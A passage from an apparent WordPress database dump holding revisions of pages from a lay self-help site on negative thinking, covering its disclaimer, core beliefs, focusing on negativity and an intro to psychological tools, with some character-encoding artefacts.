/wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 15:54:32', '2023-06-21 15:54:32', '', 88, 'https://www.happythinking.com/?p=1940', 0, 'revision', '', 0),
(1941, 1, '2023-06-21 16:12:50', '2023-06-21 16:12:50', '<!-- wp:paragraph -->\n<p>The author of this website (www.happythinking.com) is NOT a professional mental health specialist and the information is provided in good faith. Please read and understand this disclaimer and terms of use before browsing this website. Essentially this website does not contain professional medical advice, so use the information at your own risk. Continued after image below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The content of this website is for informational purposes only. Nothing found on this website is intended to be a substitute for professional psychological, psychiatric or medical advice, diagnosis or treatment. This website accepts no responsibility for the results of any actions taken on the basis of information on this website, nor for the accuracy or completeness of any material contained herein. This website expressly disclaims all and any liability and responsibility to any person in respect of the consequences of anything done or omitted to be done by such person in reliance, whether wholly or partially, upon this website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Always seek the advice of your physician or other qualified mental health provider with any questions you may have regarding a medical condition or mental disorder. Never disregard professional medical advice or delay in seeking it because of something you have read on this website. If you think you may have a medical emergency (including a mental health emergency), call your doctor or emergency services immediately.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reliance on any information provided by this website or by any person or professional appearing on this website is solely at your own risk. this website is not liable for any advice or information provided. No warranties, either expressed or implied, are made on the information provided.<br>This website reserves the right to alter, amend, vary or otherwise change any information on this website at any time and without notice to you. The provision of any URL, link, and recommended reading material is done for the convenience of users of this internet site. It does not constitute an endorsement by this website of the information provided.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you find material on this website offensive, you may choose not to use the website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By reading this and/or by browsing this website, you have agreed to this disclaimer, as well as the websiteâ€™s terms and conditions of use. If you do not agree to this disclaimer or the terms and conditions of use, you should cease your use of this website immediately.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Thank you very much for reading the above disclaimer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">HOME</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'Disclaimer', '', 'inherit', 'closed', 'closed', '', '451-revision-v1', '', '', '2023-06-21 16:12:50', '2023-06-21 16:12:50', '', 451, 'https://www.happythinking.com/?p=1941', 0, 'revision', '', 0),
(1883, 1, '2023-06-17 18:52:38', '2023-06-17 18:52:38', '', 'patternrecognition170623a', '', 'inherit', '', 'closed', '', 'patternrecognition170623a', '', '', '2023-06-17 18:52:38', '2023-06-17 18:52:38', '', 0, 'https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif', 0, 'attachment', 'image/gif', 0),
(1938, 1, '2023-06-21 15:52:15', '2023-06-21 15:52:15', '<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 15:52:15', '2023-06-21 15:52:15', '', 88, 'https://www.happythinking.com/?p=1938', 0, 'revision', '', 0),
(1939, 1, '2023-06-21 15:54:03', '2023-06-21 15:54:03', '<!-- wp:spacer {"height":"60px"} -->\n<div style="height:60px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1937,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking_210623a.jpg" alt="" class="wp-image-1937"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-21 15:54:03', '2023-06-21 15:54:03', '', 88, 'https://www.happythinking.com/?p=1939', 0, 'revision', '', 0),
(1889, 1, '2023-06-18 06:17:20', '2023-06-18 06:17:20', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs can unnecessarily negatively affect your life. Analysing oneâ€™s negative thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-06-18 06:17:20', '2023-06-18 06:17:20', '', 1632, 'https://www.happythinking.com/?p=1889', 0, 'revision', '', 0),
(1954, 1, '2023-06-21 19:09:18', '2023-06-21 19:09:18', '<!-- wp:paragraph -->\n<p>Letâ€™s now start getting to know the various types of negative thinking that people do. The first one is what I call â€œfocusing on negativityâ€. This is a very common type of negative thinking and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone on the same day as the salary increase).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may excessively focus on negative events while mostly ignoring positive events. In the example I gave, the person may excessively focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of negative thinking can make one feel that things are worse than they really are as positive events that could have countered the negativity are ignored. I call this type of negative thinking, â€œfocusing on negativityâ€ (psychologists will call it the â€œnegativity effectâ€).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would be to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, itâ€™s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that one of our ancestors was daydreaming and walking without a care in the world, and then accidentally stepped on a tigerâ€™s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1857,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg" alt="" class="wp-image-1857"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If our ancestor survived the ensuing chase, it would have been in his or her survival interest to not forget the negative event of stepping on a tigerâ€™s tail. By focusing on this negative event, our ancestor would have kept remembering the importance of not daydreaming while walking in the forest! While nowadays most of us donâ€™t walk amongst tigers and other dangers in forests, the tendency to focus on negative events may still persist in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1858,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg" alt="" class="wp-image-1858"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œfocusing on negativityâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The excessive focus on the negative event made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, itâ€™s important to recognise when you are excessively focusing on negative events. As I mentioned before, Happy Thinking is about dealing with such negative thinking. Once we have gone over the common types of negative thinking, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Focusing on Negativity', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-21 19:09:18', '2023-06-21 19:09:18', '', 1616, 'https://www.happythinking.com/?p=1954', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1888, 1, '2023-06-17 19:46:55', '2023-06-17 19:46:55', '<!-- wp:paragraph -->\n<p>Letâ€™s now start getting to know the various types of negative thinking that people do. The first one is what I call â€œfocusing on negativityâ€. This is a very common type of negative thinking and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may do the negative thinking of excessively focusing on negative events while mostly ignoring positive events. In the example I gave, the person may excessively focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of negative thinking can make one feel that things are worse than they really are as positive events that could have countered the negativity are ignored.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I call this type of negative thinking, â€œfocusing on negativityâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would have been to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, itâ€™s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that one of our ancestors was daydreaming and walking without a care in the world, and then accidentally stepped on a tigerâ€™s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1857,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg" alt="" class="wp-image-1857"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If our ancestor survived the ensuing chase, it would have been in his or her survival interest to not forget the negative event of stepping on a tigerâ€™s tail. By focusing on this negative event, our ancestor would have kept remembering the importance of not daydreaming while walking in the forest! While nowadays most of us donâ€™t walk amongst tigers and other dangers in forests, the tendency to focus on negative events may still persist in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1858,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg" alt="" class="wp-image-1858"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œfocusing on negativityâ€ type of negative thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The excessive focus on the negative event made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, itâ€™s important to recognise when you are excessively focusing on negative events. As I mentioned before, Happy Thinking is about dealing with such negative thinking. Once we have gone over the common types of negative thinking, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-thinking-patterns/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Focusing on Negativity', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-06-17 19:46:55', '2023-06-17 19:46:55', '', 1616, 'https://www.happythinking.com/?p=1888', 0, 'revision', '', 0),
(1890, 1, '2023-06-18 06:18:07', '2023-06-18 06:18:07', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common negative thinking patterns that can contribute to one being unhappy. Now that you understand these negative thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change negative thinking patterns into more helpful positive thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This one can be done using â€œtoolsâ€, something like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal, but instead, are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better detect when you are thinking in negative ways. i.e. you will become more â€œsensitiveâ€ in detecting negative thinking patterns when it happens in your mind. Other tools will help you to change negative thinking patterns into helpful positive thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect negative thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools 